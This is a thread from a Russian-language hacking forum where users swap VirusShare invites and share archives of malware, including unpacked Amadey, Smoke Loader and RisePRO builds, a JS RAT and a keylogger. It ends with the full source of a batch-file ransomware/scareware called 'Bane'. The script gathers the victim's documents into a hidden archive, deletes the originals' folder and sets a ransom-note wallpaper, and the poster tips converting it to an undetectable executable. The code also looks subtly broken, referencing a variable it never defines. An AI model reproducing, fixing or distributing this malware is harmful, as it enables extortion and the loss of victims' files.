• XSS.stack #1 – первый литературный журнал от юзеров форума

malware samples

На virusshare могу дать инвайт, если кому надо. Семплы более, чем 33млн малварей, обновляются ежедневно, типы детекта в комплекте.
Я знаю, что это старая ветка, но вы все еще хотите поделиться приглашением на virushare.com? Благодарность
 
На virusshare могу дать инвайт, если кому надо. Семплы более, чем 33млн малварей, обновляются ежедневно, типы детекта в комплекте.
если вы можете ваша помощь приветствуется
 
Dark watchman, rat на js + кейлоггер на cs. Также в архиве моя попытка в деобфускацию шарпа, мб кому пригодится.
Забыл добавить: pass - infected (скорее всего), js по дефолту не обфусцирован.
 
На virusshare могу дать инвайт, если кому надо. Семплы более, чем 33млн малварей, обновляются ежедневно, типы детекта в комплекте.
Я буду признателен, если вы поделитесь со мной кодом приглашения, я хотел бы изучить некоторые образцы вредоносных программ.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Xipher_ бл#ть какая у тебя омерзительная аватарка, смени пожалуйста
По теме все что ты сказал есть на vx underground или на их же гитхабе
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Кто мне вытащит два семпла с vt.
У вас должно быть более 200 сообщений для просмотра скрытого контента.


 
Пожалуйста, обратите внимание, что пользователь заблокирован
Никто так и не стукнул с семплами, пришлось выловить криптованный билд на трекере и распаковать. Если кому надо, вот amadey последней версии и smoke loader, распакованные голые билды. Пасс infected
 

Вложения

  • samples.zip
    232.6 КБ · Просмотры: 68
Пожалуйста, обратите внимание, что пользователь заблокирован
Распакованный RisePRO, пасс infected
 

Вложения

  • unpack.zip
    636 КБ · Просмотры: 39
он с vx?

Никто так и не стукнул с семплами, пришлось выловить криптованный билд на трекере и распаковать. Если кому надо, вот amadey последней версии и smoke loader, распакованные голые билды. Пасс infected
 
I wrote "Bane", a sudo-ransomware/scareware today using native windows commands in a .bat file.
All it does is search for files with the extensions you specify, moves them to a folder the script creates, zips the folder and then hides it.
It will then change the desktop wallpaper to one of your choosing (bane.jpg here) - in this case the "ransom note".
Convert the .bat file to an .exe file in Bat_to_exe_Converter and make sure to embed the ransom note/image. FUD.
To be fair, I did include one powershell command at the end - this is what changes the desktop background.
Educational purposes, my friends.

@echo off

:main
:: Set base folders
set "rootFolder=%USERPROFILE%"
set "documentsFolder=%USERPROFILE%\Documents"
set "movedFolder=%documentsFolder%\Moved_Here"
set "tarFile=%documentsFolder%\neon.lock.tar"
set "neonFile=%documentsFolder%\Bane.locked"
set "scriptFile=%~f0"
set "wallpaperImage=%~dp0bane.jpg"

:: Create "Moved_Here" folder if it doesn't exist
if not exist "!encryptedFolder!" mkdir "!encryptedFolder!"

:: Move files recursively
(for /r "%rootFolder%" %%F in (*.png;*.txt;*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.ppyx;*.mdb;*.accdb;*.sql;*.zip;*.rar;*.7z;*.jpeg;*.mp4;*.mov;*.pdf;) do (
move "%%F" "!encryptedFolder!" >nul
))

:: Create a tar file from the "Moved_Here" folder
tar -cf "!tarFile!" "!encryptedFolder!"

:: Change the name of the tar file to "Bane.locked"
ren "!tarFile!" "Bane.locked"

:: Hide the "Bane.locked" file
attrib +h "Bane.locked"

:: Remove the original "Moved_Here" folder
rmdir /s /q "!encryptedFolder!"

:: Set desktop wallpaper using PowerShell
powershell.exe -ExecutionPolicy Bypass -Command "& {Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Wallpaper { [DllImport(\"user32.dll\", CharSet = CharSet.Auto)] public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(0x0014, 0, path, 0x0002 | 0x0001); } }'; [Wallpaper]::SetWallpaper('%wallpaperImage%')}"
 

Вложения

  • bane.jpg
    bane.jpg
    564.2 КБ · Просмотры: 22


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх